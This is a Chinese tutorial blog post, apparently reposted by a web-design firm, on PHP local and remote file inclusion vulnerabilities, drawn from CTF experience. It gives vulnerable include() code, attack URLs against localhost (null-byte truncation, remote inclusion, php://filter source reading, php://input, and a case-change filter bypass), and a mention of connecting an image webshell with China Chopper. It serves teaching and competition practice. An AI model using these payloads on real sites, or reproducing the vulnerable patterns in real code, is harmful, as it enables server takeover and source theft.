文件包含漏洞之本地包含和遠(yuǎn)程包含

文件包含漏洞介紹:

成都創(chuàng)新互聯(lián)技術(shù)團(tuán)隊(duì)十余年來(lái)致力于為客戶提供網(wǎng)站制作、網(wǎng)站建設(shè)、品牌網(wǎng)站設(shè)計(jì)營(yíng)銷型網(wǎng)站、搜索引擎SEO優(yōu)化等服務(wù)。經(jīng)過(guò)多年發(fā)展,公司擁有經(jīng)驗(yàn)豐富的技術(shù)團(tuán)隊(duì),先后服務(wù)、推廣了千余家網(wǎng)站,包括各類中小企業(yè)、企事單位、高校等機(jī)構(gòu)單位。

  程序開(kāi)發(fā)人員一般會(huì)把重復(fù)使用的函數(shù)寫到單個(gè)文件中,需要使用某個(gè)函數(shù)時(shí)直接調(diào)用此文件,而無(wú)需再次編寫,這中文件調(diào)用的過(guò)程一般被稱為文件包含。程序開(kāi)發(fā)人員一般希望代碼更靈活,所以將被包含的文件設(shè)置為變量,用來(lái)進(jìn)行動(dòng)態(tài)調(diào)用,但正是由于這種靈活性,從而導(dǎo)致客戶端可以調(diào)用一個(gè)惡意文件,造成文件包含漏洞。幾乎所有腳本語(yǔ)言都會(huì)提供文件包含的功能,但文件包含漏洞在PHP中居多,而在JSP、ASP、ASP.NET程序中卻非常少,甚至沒(méi)有,這是有些語(yǔ)言設(shè)計(jì)的弊端。在PHP中經(jīng)常出現(xiàn)包含漏洞,但這并不意味這其他語(yǔ)言不存在。

漏洞成因:

  文件包含漏洞的產(chǎn)生原因是在通過(guò)引入文件時(shí),引用的文件名,用戶可控,由于傳入的文件名沒(méi)有經(jīng)過(guò)合理的校驗(yàn),或者校驗(yàn)被繞過(guò),從而操作了預(yù)想之外的文件,就 可能導(dǎo)致意外的文件泄露甚至惡意的代碼注入。當(dāng)被包含的文件在服務(wù)器本地時(shí),就形成的本地文件包含漏洞,被包涵的文件在第三方服務(wù)是,就形成了遠(yuǎn)程文件包 含漏洞。

漏洞危害:

    執(zhí)行惡意代碼、包含惡意文件控制網(wǎng)站、甚至控制網(wǎng)站服務(wù)器等。


本地包含漏洞:

代碼:

<?PHP

$file=@$_GET['name'];

if($file){
	include $file;
}

?>

    

以以上這個(gè)代碼為例:

訪問(wèn):http://127.0.0.1/fileupload/include.php?name=1.txt

  1. txt文件代碼為:

<?php

phpinfo();

?>

我們可以看到txt文件里的內(nèi)容以php文件的方式執(zhí)行了;如下圖所示:

文件包含漏洞之本地包含和遠(yuǎn)程包含

再看,如果訪問(wèn):http://127.0.0.1/fileupload/include.php?name=2.jpg

2.jpg是一個(gè)圖片的一句話***;

文件包含漏洞之本地包含和遠(yuǎn)程包含

用菜刀可以直接連接,也就是說(shuō)不管后綴是什么樣,最后都會(huì)以php的形式執(zhí)行。


但是有時(shí)候會(huì)這樣,這個(gè)在ISCC國(guó)賽中遇到了,就是在最后會(huì)自動(dòng)加入.php,非常煩人。

代碼2:

<?php
    Include  $_GET['page'].".php"
?>

執(zhí)行結(jié)果如下圖:

文件包含漏洞之本地包含和遠(yuǎn)程包含

如果訪問(wèn):http://127.0.0.1/fileupload/include2.php?page=1.txt

還是報(bào)錯(cuò)。

文件包含漏洞之本地包含和遠(yuǎn)程包含

解決辦法:%00截?cái)?/p>

利用環(huán)境:php版本<5.3magic_quotes_gpc取消的(magic_quotes_gpc = off)

訪問(wèn):http://127.0.0.1/fileupload/include2.php?page=1.txt%00

文件包含漏洞之本地包含和遠(yuǎn)程包含


遠(yuǎn)程包含:

  遠(yuǎn)程的文件名不能為php可解析的擴(kuò)展名(php、php5..),而且php.ini中allow_url_fopen和allow_url_include為On才可以。

訪問(wèn):http://127.0.0.1/fileupload/include.php?name=http://127.0.0.1/1.txt

文件包含漏洞之本地包含和遠(yuǎn)程包含

如果是遇到這種情況:

文件包含漏洞之本地包含和遠(yuǎn)程包含可以用“?”或者“%00”階段;

http://127.0.0.1/fileupload/include2.php?page=http://127.0.0.1/1.txt?


讀取源碼:php://filter/read=convert.base64-encode/resource=1.txt

http://127.0.0.1/fileupload/include.php?name=php://filter/read=convert.base64-encode/resource=1.txt

讀取出來(lái)的是base64編碼的,進(jìn)行解碼就行了。

文件包含漏洞之本地包含和遠(yuǎn)程包含

php://input的用法

php://input

文件包含漏洞之本地包含和遠(yuǎn)程包含

偽協(xié)議繞過(guò)大小寫:

<?php
    
    if(isset($_GET['f'])){
        if(strpos($_GET['f'],"php") !== False){
            die("error...");
        }
        else{
            include($_GET['f'] . '.php');
        }
    }
    
?>

http://127.0.0.1//index.php?f=pHP://filter/read=convert.base64-encode/resource=index

readfile讀取文件,不可以getshell

<?php
	
	 @readfile($_GET["file"]);
?>

總結(jié):這些在iscc的國(guó)賽賽中出現(xiàn)過(guò),如果當(dāng)時(shí)會(huì)階段或者會(huì)讀取源碼,也就能獲獎(jiǎng)了,學(xué)無(wú)止境,加油吧。


分享文章:文件包含漏洞之本地包含和遠(yuǎn)程包含
轉(zhuǎn)載源于:http://bm7419.com/article24/igooce.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供定制開(kāi)發(fā)外貿(mào)建站、虛擬主機(jī)、網(wǎng)站內(nèi)鏈、品牌網(wǎng)站設(shè)計(jì)、網(wǎng)站制作

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

網(wǎng)站托管運(yùn)營(yíng)